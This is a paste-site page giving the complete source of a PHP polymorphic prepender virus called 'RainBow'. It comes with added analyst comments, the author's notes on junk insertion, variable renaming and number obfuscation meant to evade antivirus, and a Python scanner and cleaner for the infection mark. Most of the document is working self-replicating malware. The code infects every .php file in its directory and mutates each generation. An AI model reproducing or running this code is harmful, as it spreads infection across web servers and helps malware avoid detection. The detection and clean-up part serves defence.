FlyFar

Virus.PHP.Polymorph-Rainbow.A - Source Code - PHP Prepender Virus

Feb 19th, 2023
```php
<?php // RainBow
// Analyst notes (added here, not in the original paste) precede each stage.
// The self-parser below drops every line that starts with '/' or '$', so all of
// the author's real assignment lines begin with a space; that whitespace matters.
srand((double)microtime()*1000000);
// Names that get replaced in every generation (see the str_replace loop below).
 $changevars=array('changevars','string','newcont','curdir','filea','victim','viccont','newvars','returnvar','counti','countj','trash','allcont','number','remn');
// Read the running file line by line (strtok treats CR and LF as separators) and
// start a fresh copy headed by the infection mark.
 $string=strtok(fread(fopen(__FILE__,'r'), filesize(__FILE__)),chr(13).chr(10));
 $newcont='<?php // RainBow'.chr(13).chr(10);
// Stage 1: copy own code up to the closing '?>'. Before each line, with 1/2 chance,
// each of three junk kinds (comment, string assignment, numeric assignment) is
// inserted with 1/2 chance; the previous generation's junk is discarded.
while ($string && $string!='?>'){
if(rand(0,1)){
if(rand(0,1)){$newcont.='// '.trash('',0).chr(13).chr(10);}
if(rand(0,1)){$newcont.='$'.trash('',0).'='.chr(39).trash('',0).chr(39).';'.chr(13).chr(10);}
if(rand(0,1)){$newcont.='$'.trash('',0).'='.rand().';'.chr(13).chr(10);}}
 $string=strtok(chr(13).chr(10));
if($string{0}!='/' && $string{0}!='$'){$newcont.=$string.chr(13).chr(10);}}
// Stage 2: rename every listed variable/function to a fresh random lowercase name.
 $counti=0;
while($changevars[$counti]){
 $newcont=str_replace($changevars[$counti++],trash('',0),$newcont);}
// Stage 3: scan for runs of digits; with probability 1/6 (!rand(0,5)) rewrite the
// number as an equivalent (a+b), (a-b) or (a/b) expression. $allcont is never
// initialised, and the {} string-offset syntax used here was removed in PHP 8.0.
 $countj=-1; $number='';
while(++$countj<strlen($newcont)){
if (ord($newcont{$countj})>47&&ord($newcont{$countj})<58){
 $number=$newcont{$countj};
while(ord($newcont{++$countj})>47&&ord($newcont{$countj})<58){$number.=$newcont{$countj};}
 $remn=rand(1,10);
if (!rand(0,5)){switch(rand(1,3)){case 1:$allcont.='('.($number-$remn).'+'.$remn.')';break;
case 2:$allcont.='('.($number+$remn).'-'.$remn.')';break;
case 3:$allcont.='('.($number*$remn).'/'.$remn.')';break;}}else{$allcont.=$number;}}
 $allcont.=$newcont{$countj};$number='';}
// Stage 4: prepend the new generation to every file in the current directory whose
// name contains '.php' and whose first 25 bytes do not already contain 'RainBow'.
 $curdir=opendir('.');
while($filea=readdir($curdir)){
if(strstr($filea,'.php')){$victim=fopen($filea,'r+');
if (!strstr(fread($victim, 25),'RainBow')){rewind($victim);
 $viccont=fread($victim,filesize($filea));
rewind($victim);
fwrite($victim,$allcont.$viccont);}
fclose($victim);}}
closedir($curdir);
// Junk generator: a run of random lowercase letters (roughly 6 to 16 long, since
// rand(5,15) is re-drawn on every loop check).
function trash($returnvar, $countj){
do{$returnvar.=chr(rand(97,122));}while($countj++<rand(5,15));
return $returnvar;}
?>
```
Comments
  • FlyFar
    1 year
    PHP.Rainbow
    by Second Part To Hell[rRlf]
    www.spth.de.vu
    spth@aonmail.at
    written in October 2003
    in Austria

    Technique Information:

    * Poly Engines

    --> Adding Trash/Junk/Garbage
    The Virus adds in one of two lines a junk line to the code.
    This junk line could contain:
    - // anything
    - $anything='anything';
    - $anything=number;
    Because the code would be damn big after the 5th generation, I decided
    to delete the trash after every generation and make a new one. Anyway,
    the chance to get a trash line will be bigger, because there are more
    lines (more lines --> more chance). But I tested about 30 generations
    and it's no big problem with the size.

    --> Changing Variable/function names
    The Virus uses an array with all variable/function names of the virus;
    every generation it changes every array entry (every name) to a 5-15
    character long new name.

    --> Number changing
    The virus is able to change every number in the code. This is a really
    successful way to fake AVs, I think! A number (for instance '10') could
    also be one of the following things:
    10=(8+2)
    10=(19-9)
    10=(130/13)
    It's easy to understand, I think. I decided to change every 5th number I can
    find, because it looks better than changing every number every generation.

    * Infection Method

    --> Prepender
    This code is a prepender virus, which doesn't harm the victim file.
    It reads the first PHP part (which is the whole virus code) of the current
    file (__FILE__, as it's called in PHP). Then it searches for every PHP file
    in the current directory, and adds the changed virus code at the beginning of
    the victim file. Before infecting, the virus checks if there's already an
    infection mark of the virus, which is 'RainBow'.

    Something else a little interesting is that it's hard to get many different generations from
    the virus, because it just changes if it infects a file. And just the infected file has the
    different form, not the old virus.

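A clean-up-side counterpart to the prepender described in the comment above, as an added example that is not code from the paste or its author: a small Python scanner and cleaner that looks for the same 'RainBow' mark the virus checks in a victim's first 25 bytes and strips the prepended block up to its closing '?>' line. It assumes only what the posted source shows (the mark in the first line, CRLF line endings inside the block, and a '?>' line terminating it); the embedded sample infected content is constructed and contains no virus code.

```python
# Added example, not part of the paste: detector/cleaner for the prepender above.
# Assumes the structure visible in the posted source: 'RainBow' mark within the
# first 25 bytes, CRLF junk lines, and a block closed by a line that is exactly '?>'.
import os

MARK = b"RainBow"
MARK_WINDOW = 25  # the virus reads 25 bytes of each victim to look for its mark

def is_marked(content: bytes) -> bool:
    """True when the infection mark sits where the virus itself checks for it."""
    return MARK in content[:MARK_WINDOW]

def split_prepended_block(content: bytes):
    """(block, original); block is b'' if unmarked or no closing '?>' line (leave for review)."""
    if not is_marked(content):
        return b"", content
    cut = 0
    for line in content.splitlines(keepends=True):  # CRLF block, any line ending after it
        cut += len(line)
        if line.strip() == b"?>":  # the '?>' inside the virus's string literal is never alone
            return content[:cut], content[cut:]
    return b"", content

def disinfect_file(path: str, dry_run: bool = True) -> bool:
    """Strip the prepended block in place; True if the file is (or would be) cleaned."""
    with open(path, "rb") as fh:
        content = fh.read()
    block, original = split_prepended_block(content)
    if not block:
        return False
    if not dry_run:
        with open(path, "wb") as fh:
            fh.write(original)
    return True

def scan_directory(directory: str) -> list:
    """Marked files in one directory; '.php' anywhere in the name, as the virus matches it."""
    hits = []
    for name in sorted(os.listdir(directory)):
        path = os.path.join(directory, name)
        if ".php" in name and os.path.isfile(path):
            with open(path, "rb") as fh:
                if is_marked(fh.read(MARK_WINDOW)):
                    hits.append(path)
    return hits

# Constructed sample (same shape as the prepended block, no real virus code) for the test.
SAMPLE_BLOCK = (b"<?php // RainBow\r\n// qwerty\r\n$abc='defgh';\r\n"
                b"while ($zz && $zz!='?>'){\r\n?>\r\n")
SAMPLE_ORIGINAL = b"<?php\necho 'hello';\n"
```

Because the virus only touches the directory it runs in, run scan_directory over each web-root directory separately and keep dry_run=True until the reported files have been reviewed.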